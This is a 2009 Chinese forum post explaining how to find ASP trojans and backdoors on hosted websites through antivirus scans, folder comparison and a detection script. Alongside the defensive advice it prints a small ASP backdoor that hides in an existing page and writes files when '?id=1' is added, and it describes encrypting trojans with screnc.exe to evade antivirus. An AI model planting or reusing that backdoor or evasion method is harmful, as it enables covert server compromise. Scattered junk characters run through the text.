下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2487|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 - Q2 B* a2 }9 i+ t' u, ~* H
    ! x6 o- @9 d4 O8 |5 ?) m
    通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 % H& W# Y& W% n: r& d" g( R
    0 ~$ p3 b; f. P! ^
    一.技巧1:杀毒软件查杀
    3 }- a4 `- p2 j" c3 X' }6 Z  @" v! s& V! {  K# K7 f
    一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
    . L- e6 L) x8 O7 g" H" M. e
    + s# E) Q. m: V) N  q利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 1 V& J* Z7 v$ V" m/ [# R* y
    7 l( W9 `4 \% a9 H# ^$ D' o
    二.技巧2:FTP客户端对比   ^  E6 U; u& F- C4 c0 D
    ( b( \/ Q" r8 X5 y. E9 V, S) K
    上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: & l1 m4 V5 m! k. e7 p
    * S1 ~, q! c" O6 a7 ]0 u  l8 u1 N1 B
    screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
    ' W5 ]3 U' I6 f  m5 X3 t
    " ~7 s  O6 a& T/ @# e经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 0 K# p" N' v6 h
    0 m" g: ~9 j5 I1 K
    等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
    2 s& Y, C0 i4 f# L: \- I0 h% L- t2 S
    盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 & H1 w* H- W  A
    5 [) D: ^$ r8 {9 ?1 w
    所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 8 K# t  L6 e7 T

    # y9 S0 _/ ?3 F这里以FlashFXP进行操作讲解。 % U6 p. Q2 R) y  y9 u# k, F7 ?

    ( j* N# C5 l" O步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 ) }. E( t0 g: c( G) z7 r

    ! [1 w. h0 Z& d& @! V步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 2 `! C  G' _$ o. U! u
    : v  d5 Q9 @" v& Y( m
    我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
    ' ?1 ^$ U0 S2 |- o% ^5 V% O, g三.技巧3:用Beyond Compare 2进行对比
    8 z" E% B4 M! W. Y3 o3 B% p5 A0 o3 e# d1 f: K+ ?6 x6 l" H
    上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: & {! a& {# k/ b6 Z6 [7 r

    ; R) ]9 F/ C0 \〈%
    : ^: w" R# Z( j" M- b% E/ g( v, a; r; S# M
    on error resume next 0 [: R8 K% Z1 }! ^3 D/ ~/ I
    % w. o# k: k6 h. x/ o4 g
    id=request("id")
    % X4 ?& n, w5 E" Z0 h  F& ^% T' W/ d. H' _
    if request("id")=1 then
    : X& |/ ]8 l* B% n
    6 S% z7 x) \5 O, _testfile=Request.form("name") / v+ t/ T" o: k8 Z- G; r

    " n3 O2 J1 y6 ], |msg=Request.form("message") ) j& P9 L: \' S# f9 W. }/ G* @2 \2 r

    3 r  W& ]9 u: }( A$ T5 iset fs=server.CreatObject("scripting.filesystemobject")
    1 j9 N8 S9 P; |/ S$ C1 A/ k5 ~( }0 t. w8 C4 J  K9 \  q1 F* T
    set thisfile=fs.openTestFile(testfile,8,True,0) # d7 n; \8 T% ^/ y: H
    - O1 ]8 F' h! b  E  c' o
    thisfile.Writeline(""&msg&"")
    / r& \) G) _+ S% |8 h5 O7 z6 g' l  D% [* K
    thisfile.close 9 {" B, p: G% S

    * e* ?, Y4 R8 s0 z0 iset fs=nothing 5 B3 j; _6 O3 ~) ]( }. u0 h
    ; z& ?: |( K& Q  H
    %〉 7 {9 P" L1 G. O6 G8 `
    . I) m% v5 _+ S1 ^; w
    〈from method="post" Action="保存"?id=1〉 - n8 O2 k" G0 m4 u% R

    ( c) z/ {9 i. T: c2 }〈input type="text" size="20" name="Name"
    + d1 C  `1 B5 s0 b. t( i* A, p
    ( Z  N3 }3 D! ?( }2 q) l" F' MValue=〈%=server.mappath("XP.ASP")%〉〉 & S3 B  h/ i: ?

    0 o' B8 }, ?4 N' R〈textarea name="Message" class=input〉
    7 Y/ ]# \' x* [8 L, y
    ) _% {* P1 ]7 |7 Q' W1 }4 }" A/ f: q5 [8 ?* a# Y+ P
    〈/textarea〉
    " {& i; I' S+ H0 I. z* @
    4 b( e, \  ?) g) N$ J〈input type="Submit" name="send" Value="生成"
    ' n7 _, y5 v# p6 t1 f2 \, J, m* E3 X+ B' r( f8 U) I
    class=input〉 " ~3 D  q/ `* c& U! B

    . l! k! ]/ r4 m# o) F! V& I〈/from〉 5 v6 \) p/ J( V

    5 m7 e- D9 f1 C4 @〈%end if%〉 9 U' _6 e  i$ v
    . B' q' Z3 B# @5 i/ i! r# O6 p
    注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
    * y1 {4 {" j0 ?7 ^5 Y; X8 M
    0 D5 O7 a. K$ c假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 0 @0 |, Z* e; T. `

    % ]* c2 v$ o. X) b" a这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
    8 ]3 t4 j! v8 r  q& X2 X9 y9 W( y
    & M! w* `6 c- n- Q+ IBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
    7 q* C( t+ B* M0 q$ D+ R0 z
    5 @3 p: L4 C( M" ]" K4 T  X
    看我来利用它完成渗透性asp木马的查找。
    % V, y+ U, [$ v. g  M6 f& v' H  {9 f+ n8 ?( m- w
    步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
    4 j. V. Y" B, P( f, O5 ]- x0 A1 w
    步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
    : I$ A$ j& C$ K3 L7 B
    ; N" K2 q% _/ D/ [" {1 W/ E2 F步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! 8 n# u5 `- E& k8 Q8 `. K
    , g6 M' M; E  |7 r
    ; p7 E$ t8 |! [, K: X5 L
    四.技巧4:利用组件性能找asp木马
    ( u8 g/ |. N4 j* A- ?" z
    ! p* y/ D6 E4 z: ?) F! `6 x上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
    . V( s6 I7 H) _! M5 g4 j& V( I$ O
    ( f* c: u2 X7 |# v如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 0 i) }; v# ?3 ^- {, Y  Q$ A7 M; O
    3 Y6 B. W* T/ [
    它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 + I: G, c5 O# o2 ?9 l9 q% F
    3 q6 j) @3 |/ o+ l7 ?* i
    使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 % S/ b; I4 E/ d% S2 A
    $ P  @9 R1 H6 I' U
    一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
    ' T- B, R% J' |& P" g- G) S# a, a: ]0 x) [- t3 {) E
    大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表